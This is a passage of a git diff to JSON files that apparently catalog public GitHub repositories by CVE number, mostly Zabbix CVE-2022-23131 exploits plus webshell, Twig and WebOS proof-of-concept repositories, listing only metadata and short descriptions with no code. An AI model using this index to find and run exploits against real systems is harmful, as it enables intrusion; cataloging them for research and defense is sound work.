"2022-02-18T08:38:53Z", + "updated_at": "2024-11-16T19:56:16Z", + "pushed_at": "2022-02-21T04:27:48Z", + "stargazers_count": 94, + "watchers_count": 94, + "has_discussions": false, + "forks_count": 42, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 42, + "watchers": 94, + "score": 0, + "subscribers_count": 3 + }, { "id": 460833137, "name": "cve-2022-23131", @@ -29,5 +91,574 @@ "watchers": 150, "score": 0, "subscribers_count": 2 + }, + { + "id": 460891453, + "name": "CVE-2022-23131", + "full_name": "1mxml\/CVE-2022-23131", + "owner": { + "login": "1mxml", + "id": 94277520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94277520?v=4", + "html_url": "https:\/\/github.com\/1mxml", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1mxml\/CVE-2022-23131", + "description": null, + "fork": false, + "created_at": "2022-02-18T14:48:53Z", + "updated_at": "2024-10-01T19:30:30Z", + "pushed_at": "2022-02-19T03:14:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 461681428, + "name": "cve-2022-23131", + "full_name": "zwjjustdoit\/cve-2022-23131", + "owner": { + "login": "zwjjustdoit", + "id": 50495555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50495555?v=4", + "html_url": "https:\/\/github.com\/zwjjustdoit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zwjjustdoit\/cve-2022-23131", + "description": "poc", + "fork": false, + "created_at": "2022-02-21T02:42:23Z", + "updated_at": "2024-09-02T11:20:46Z", + "pushed_at": "2022-02-21T04:55:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 462095141, + "name": "cve-2022-23131", + "full_name": "L0ading-x\/cve-2022-23131", + "owner": { + "login": "L0ading-x", + "id": 55682875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55682875?v=4", + "html_url": "https:\/\/github.com\/L0ading-x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/L0ading-x\/cve-2022-23131", + "description": "cve-2022-23131", + "fork": false, + "created_at": "2022-02-22T01:39:52Z", + "updated_at": "2024-11-30T15:52:15Z", + "pushed_at": "2022-02-22T01:45:34Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 462818933, + "name": "cve-2022-23131-exp", + "full_name": "random-robbie\/cve-2022-23131-exp", + "owner": { + "login": "random-robbie", + "id": 4902869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4902869?v=4", + "html_url": "https:\/\/github.com\/random-robbie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/random-robbie\/cve-2022-23131-exp", + "description": "Zabbix SSO Bypass", + "fork": false, + "created_at": "2022-02-23T16:34:03Z", + "updated_at": "2024-08-12T20:20:57Z", + "pushed_at": "2022-02-23T16:37:13Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 463061723, + "name": "CVE-2022-23131", + "full_name": "trganda\/CVE-2022-23131", + "owner": { + "login": "trganda", + "id": 62204882, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204882?v=4", + "html_url": "https:\/\/github.com\/trganda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trganda\/CVE-2022-23131", + "description": null, + "fork": false, + "created_at": "2022-02-24T08:10:46Z", + "updated_at": "2022-02-25T06:42:32Z", + "pushed_at": "2022-02-24T11:50:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 463123908, + "name": "CVE-2022-23131", + "full_name": "pykiller\/CVE-2022-23131", + "owner": { + "login": "pykiller", + "id": 38202442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38202442?v=4", + "html_url": "https:\/\/github.com\/pykiller", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pykiller\/CVE-2022-23131", + "description": null, + "fork": false, + "created_at": "2022-02-24T11:34:27Z", + "updated_at": "2024-09-15T03:17:48Z", + "pushed_at": "2022-02-24T11:59:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 464117448, + "name": "zabbix-cve-2022-23131", + "full_name": "Fa1c0n35\/zabbix-cve-2022-23131", + "owner": { + "login": "Fa1c0n35", + "id": 33335488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33335488?v=4", + "html_url": "https:\/\/github.com\/Fa1c0n35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fa1c0n35\/zabbix-cve-2022-23131", + "description": null, + "fork": false, + "created_at": "2022-02-27T11:30:53Z", + "updated_at": "2023-12-08T02:32:32Z", + "pushed_at": "2022-02-27T11:31:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 464439372, + "name": "CVE-2022-23131", + "full_name": "kh4sh3i\/CVE-2022-23131", + "owner": { + "login": "kh4sh3i", + "id": 64693844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4", + "html_url": "https:\/\/github.com\/kh4sh3i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kh4sh3i\/CVE-2022-23131", + "description": "Zabbix - SAML SSO Authentication Bypass", + "fork": false, + "created_at": "2022-02-28T10:37:02Z", + "updated_at": "2025-01-01T05:20:19Z", + "pushed_at": "2022-03-31T20:17:36Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "attack", + "authentication", + "cve", + "dork", + "nuclei", + "nuclei-templates", + "saml", + "sso", + "zabbix", + "zabbix-agent" + ], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 477136317, + "name": "CVE-2022-23131", + "full_name": "Kazaf6s\/CVE-2022-23131", + "owner": { + "login": "Kazaf6s", + "id": 49508660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49508660?v=4", + "html_url": "https:\/\/github.com\/Kazaf6s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kazaf6s\/CVE-2022-23131", + "description": "CVE-2022-23131漏洞利用工具开箱即用。", + "fork": false, + "created_at": "2022-04-02T18:16:56Z", + "updated_at": "2024-08-12T20:22:06Z", + "pushed_at": "2022-04-02T19:00:40Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 516626302, + "name": "CVE-2022-23131poc-exp-zabbix-", + "full_name": "SCAMagic\/CVE-2022-23131poc-exp-zabbix-", + "owner": { + "login": "SCAMagic", + "id": 51362701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51362701?v=4", + "html_url": "https:\/\/github.com\/SCAMagic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SCAMagic\/CVE-2022-23131poc-exp-zabbix-", + "description": "CVE-2022-23131漏洞批量检测与利用脚本", + "fork": false, + "created_at": "2022-07-22T05:48:23Z", + "updated_at": "2024-01-02T01:19:26Z", + "pushed_at": "2022-07-22T05:55:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 531935227, + "name": "Zabbix-CVE-2022-23131", + "full_name": "Vulnmachines\/Zabbix-CVE-2022-23131", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Zabbix-CVE-2022-23131", + "description": "Zabbix-SAML-Bypass: CVE-2022-23131", + "fork": false, + "created_at": "2022-09-02T13:24:13Z", + "updated_at": "2022-10-17T16:23:15Z", + "pushed_at": "2022-09-02T13:26:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 586260198, + "name": "cve-2022-23131", + "full_name": "wr0x00\/cve-2022-23131", + "owner": { + "login": "wr0x00", + "id": 86941613, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86941613?v=4", + "html_url": "https:\/\/github.com\/wr0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wr0x00\/cve-2022-23131", + "description": null, + "fork": false, + "created_at": "2023-01-07T14:09:40Z", + "updated_at": "2024-10-01T19:30:20Z", + "pushed_at": "2023-01-07T14:22:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 586722779, + "name": "CVE-2022-23131_exp", + "full_name": "Arrnitage\/CVE-2022-23131_exp", + "owner": { + "login": "Arrnitage", + "id": 48816467, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48816467?v=4", + "html_url": "https:\/\/github.com\/Arrnitage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arrnitage\/CVE-2022-23131_exp", + "description": "zabbix saml bypass", + "fork": false, + "created_at": "2023-01-09T04:10:08Z", + "updated_at": "2023-02-09T03:20:18Z", + "pushed_at": "2023-01-09T04:10:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604432382, + "name": "Zabbix-SAML-SSO-_CVE-2022-23131", + "full_name": "clearcdq\/Zabbix-SAML-SSO-_CVE-2022-23131", + "owner": { + "login": "clearcdq", + "id": 81290636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81290636?v=4", + "html_url": "https:\/\/github.com\/clearcdq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/clearcdq\/Zabbix-SAML-SSO-_CVE-2022-23131", + "description": null, + "fork": false, + "created_at": "2023-02-21T03:30:20Z", + "updated_at": "2023-03-20T07:44:06Z", + "pushed_at": "2023-02-21T03:45:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709195408, + "name": "CVE-2022-23131", + "full_name": "r10lab\/CVE-2022-23131", + "owner": { + "login": "r10lab", + "id": 92838079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92838079?v=4", + "html_url": "https:\/\/github.com\/r10lab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r10lab\/CVE-2022-23131", + "description": null, + "fork": false, + "created_at": "2023-10-24T08:11:06Z", + "updated_at": "2023-10-24T08:12:16Z", + "pushed_at": "2023-10-24T08:13:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 859400181, + "name": "CVE-2022-23131", + "full_name": "fork-bombed\/CVE-2022-23131", + "owner": { + "login": "fork-bombed", + "id": 57873842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57873842?v=4", + "html_url": "https:\/\/github.com\/fork-bombed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fork-bombed\/CVE-2022-23131", + "description": "CVE-2022-23131 Zabbix Server SAML authentication exploit", + "fork": false, + "created_at": "2024-09-18T15:42:26Z", + "updated_at": "2024-09-18T16:20:37Z", + "pushed_at": "2024-09-18T15:58:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 878490904, + "name": "CVE-2022-23131", + "full_name": "davidzzo23\/CVE-2022-23131", + "owner": { + "login": "davidzzo23", + "id": 156780826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156780826?v=4", + "html_url": "https:\/\/github.com\/davidzzo23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davidzzo23\/CVE-2022-23131", + "description": "Zabbix Frontend Authentication Bypass Vulnerability", + "fork": false, + "created_at": "2024-10-25T13:44:21Z", + "updated_at": "2024-10-30T12:47:46Z", + "pushed_at": "2024-10-25T14:00:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896349551, + "name": "Zabbix-cve-2022-23131-SSO-bypass", + "full_name": "dagowda\/Zabbix-cve-2022-23131-SSO-bypass", + "owner": { + "login": "dagowda", + "id": 114467712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114467712?v=4", + "html_url": "https:\/\/github.com\/dagowda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dagowda\/Zabbix-cve-2022-23131-SSO-bypass", + "description": null, + "fork": false, + "created_at": "2024-11-30T05:49:21Z", + "updated_at": "2024-11-30T06:01:18Z", + "pushed_at": "2024-11-30T06:01:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-23222.json b/2022/CVE-2022-23222.json index 711cd18c6c..48cc93d645 100644 --- a/2022/CVE-2022-23222.json +++ b/2022/CVE-2022-23222.json @@ -60,5 +60,67 @@ "watchers": 5, "score": 0, "subscribers_count": 1 + }, + { + "id": 512269234, + "name": "CVE-2022-23222", + "full_name": "FridayOrtiz\/CVE-2022-23222", + "owner": { + "login": "FridayOrtiz", + "id": 29507827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29507827?v=4", + "html_url": "https:\/\/github.com\/FridayOrtiz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FridayOrtiz\/CVE-2022-23222", + "description": "CVE-2022-23222, managed with Rust.", + "fork": false, + "created_at": "2022-07-09T19:28:46Z", + "updated_at": "2022-09-01T21:21:15Z", + "pushed_at": "2022-08-30T20:56:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 577090166, + "name": "ProjetSecu", + "full_name": "LeoMarche\/ProjetSecu", + "owner": { + "login": "LeoMarche", + "id": 57867045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57867045?v=4", + "html_url": "https:\/\/github.com\/LeoMarche", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LeoMarche\/ProjetSecu", + "description": "work on CVE-2022-23222.", + "fork": false, + "created_at": "2022-12-11T23:33:14Z", + "updated_at": "2023-03-11T10:09:49Z", + "pushed_at": "2022-12-16T15:23:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-23277.json b/2022/CVE-2022-23277.json new file mode 100644 index 0000000000..7a39bd5a3a --- /dev/null +++ b/2022/CVE-2022-23277.json @@ -0,0 +1,33 @@ +[ + { + "id": 550883583, + "name": "CVE-2022-23277", + "full_name": "7BitsTeam\/CVE-2022-23277", + "owner": { + "login": "7BitsTeam", + "id": 107024599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107024599?v=4", + "html_url": "https:\/\/github.com\/7BitsTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7BitsTeam\/CVE-2022-23277", + "description": "CVE-2022-23277 POC to write a webshell to aspnet_client", + "fork": false, + "created_at": "2022-10-13T13:35:18Z", + "updated_at": "2024-06-27T08:08:54Z", + "pushed_at": "2022-10-24T15:01:06Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23303.json b/2022/CVE-2022-23303.json new file mode 100644 index 0000000000..4cc134a7b2 --- /dev/null +++ b/2022/CVE-2022-23303.json @@ -0,0 +1,33 @@ +[ + { + "id": 716883546, + "name": "hostapd_mirror", + "full_name": "web-logs2\/hostapd_mirror", + "owner": { + "login": "web-logs2", + "id": 143675346, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143675346?v=4", + "html_url": "https:\/\/github.com\/web-logs2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/web-logs2\/hostapd_mirror", + "description": "mirror of https:\/\/w1.fi\/cgit\/hostap\/ till 30\/01\/2023 for CVE-2022-23303\/4 - c22", + "fork": false, + "created_at": "2023-11-10T04:24:19Z", + "updated_at": "2023-11-10T04:24:19Z", + "pushed_at": "2023-02-01T06:29:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23305.json b/2022/CVE-2022-23305.json index cf4573cb83..fe92d33ad7 100644 --- a/2022/CVE-2022-23305.json +++ b/2022/CVE-2022-23305.json @@ -48,5 +48,69 @@ "watchers": 38, "score": 0, "subscribers_count": 5 + }, + { + "id": 450360735, + "name": "CVE-2022-RCE", + "full_name": "AlphabugX\/CVE-2022-RCE", + "owner": { + "login": "AlphabugX", + "id": 27001865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27001865?v=4", + "html_url": "https:\/\/github.com\/AlphabugX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlphabugX\/CVE-2022-RCE", + "description": "test 反向辣鸡数据投放 CVE-2022-23305 工具 利用 教程 Exploit POC ", + "fork": false, + "created_at": "2022-01-21T05:07:59Z", + "updated_at": "2025-01-05T13:55:52Z", + "pushed_at": "2022-01-21T05:21:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 670307374, + "name": "CVE-2022-23305_POC", + "full_name": "tkomlodi\/CVE-2022-23305_POC", + "owner": { + "login": "tkomlodi", + "id": 6026319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6026319?v=4", + "html_url": "https:\/\/github.com\/tkomlodi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tkomlodi\/CVE-2022-23305_POC", + "description": "CVE-2022-23305 Log4J JDBCAppender SQl injection POC ", + "fork": false, + "created_at": "2023-07-24T18:52:15Z", + "updated_at": "2024-05-16T10:33:38Z", + "pushed_at": "2023-07-24T19:47:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-23361.json b/2022/CVE-2022-23361.json new file mode 100644 index 0000000000..27ad23116f --- /dev/null +++ b/2022/CVE-2022-23361.json @@ -0,0 +1,33 @@ +[ + { + "id": 464985298, + "name": "CVE-2022-23361", + "full_name": "ViNi0608\/CVE-2022-23361", + "owner": { + "login": "ViNi0608", + "id": 59651556, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59651556?v=4", + "html_url": "https:\/\/github.com\/ViNi0608", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ViNi0608\/CVE-2022-23361", + "description": "CVE-2022-23361", + "fork": false, + "created_at": "2022-03-01T17:08:19Z", + "updated_at": "2022-03-04T06:27:01Z", + "pushed_at": "2022-03-09T15:20:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23378.json b/2022/CVE-2022-23378.json new file mode 100644 index 0000000000..9169dc33d7 --- /dev/null +++ b/2022/CVE-2022-23378.json @@ -0,0 +1,33 @@ +[ + { + "id": 448138999, + "name": "CVE-2022-23378", + "full_name": "TheGetch\/CVE-2022-23378", + "owner": { + "login": "TheGetch", + "id": 7243819, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7243819?v=4", + "html_url": "https:\/\/github.com\/TheGetch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheGetch\/CVE-2022-23378", + "description": "Authenticated reflected XSS in TastyIgniter version v3.2.2.", + "fork": false, + "created_at": "2022-01-14T23:54:36Z", + "updated_at": "2022-04-19T19:10:21Z", + "pushed_at": "2022-02-16T14:36:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23529.json b/2022/CVE-2022-23529.json new file mode 100644 index 0000000000..01220afc0f --- /dev/null +++ b/2022/CVE-2022-23529.json @@ -0,0 +1,33 @@ +[ + { + "id": 598042130, + "name": "CVE-2022-23529-PoC", + "full_name": "hackintoanetwork\/CVE-2022-23529-PoC", + "owner": { + "login": "hackintoanetwork", + "id": 83481196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83481196?v=4", + "html_url": "https:\/\/github.com\/hackintoanetwork", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackintoanetwork\/CVE-2022-23529-PoC", + "description": "CVE-2022-23529-PoC", + "fork": false, + "created_at": "2023-02-06T09:19:20Z", + "updated_at": "2023-02-06T09:18:59Z", + "pushed_at": "2023-02-04T10:16:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23614.json b/2022/CVE-2022-23614.json new file mode 100644 index 0000000000..dfe6afcbe6 --- /dev/null +++ b/2022/CVE-2022-23614.json @@ -0,0 +1,68 @@ +[ + { + "id": 515132707, + "name": "CVE-2022-23614", + "full_name": "davwwwx\/CVE-2022-23614", + "owner": { + "login": "davwwwx", + "id": 26136505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26136505?v=4", + "html_url": "https:\/\/github.com\/davwwwx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davwwwx\/CVE-2022-23614", + "description": "PoC for CVE-2022-23614 (Twig sort filter code execution\/sandbox bypass)", + "fork": false, + "created_at": "2022-07-18T10:14:50Z", + "updated_at": "2023-10-22T17:49:58Z", + "pushed_at": "2022-07-18T19:36:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-23614", + "php", + "twig" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 662215491, + "name": "CVE-2022-23614", + "full_name": "4rtamis\/CVE-2022-23614", + "owner": { + "login": "4rtamis", + "id": 62891170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62891170?v=4", + "html_url": "https:\/\/github.com\/4rtamis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4rtamis\/CVE-2022-23614", + "description": "Proof of concept for CVE-2022-23614 (command injection in Twig)", + "fork": false, + "created_at": "2023-07-04T15:52:50Z", + "updated_at": "2023-07-04T16:57:04Z", + "pushed_at": "2023-07-04T16:57:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23648.json b/2022/CVE-2022-23648.json new file mode 100644 index 0000000000..946a360ba2 --- /dev/null +++ b/2022/CVE-2022-23648.json @@ -0,0 +1,33 @@ +[ + { + "id": 474143968, + "name": "CVE-2022-23648-POC", + "full_name": "raesene\/CVE-2022-23648-POC", + "owner": { + "login": "raesene", + "id": 68317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68317?v=4", + "html_url": "https:\/\/github.com\/raesene", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raesene\/CVE-2022-23648-POC", + "description": "POC for CVE-2022-23648", + "fork": false, + "created_at": "2022-03-25T19:43:59Z", + "updated_at": "2024-11-05T04:01:41Z", + "pushed_at": "2022-03-29T09:55:15Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 36, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23731.json b/2022/CVE-2022-23731.json new file mode 100644 index 0000000000..2439327592 --- /dev/null +++ b/2022/CVE-2022-23731.json @@ -0,0 +1,45 @@ +[ + { + "id": 441808910, + "name": "WAMpage", + "full_name": "DavidBuchanan314\/WAMpage", + "owner": { + "login": "DavidBuchanan314", + "id": 13520633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13520633?v=4", + "html_url": "https:\/\/github.com\/DavidBuchanan314", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DavidBuchanan314\/WAMpage", + "description": "WAMpage - A WebOS root LPE exploit chain (CVE-2022-23731)", + "fork": false, + "created_at": "2021-12-26T04:29:09Z", + "updated_at": "2024-10-14T13:59:41Z", + "pushed_at": "2022-03-19T16:24:28Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "arm", + "cve-2022-23731", + "exploit", + "javascript", + "lg-webos", + "lg-webos-tv", + "lpe", + "python", + "v8", + "webos", + "webos-tv" + ], + "visibility": "public", + "forks": 8, + "watchers": 47, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23773.json b/2022/CVE-2022-23773.json new file mode 100644 index 0000000000..93b6dd5daf --- /dev/null +++ b/2022/CVE-2022-23773.json @@ -0,0 +1,95 @@ +[ + { + "id": 537536294, + "name": 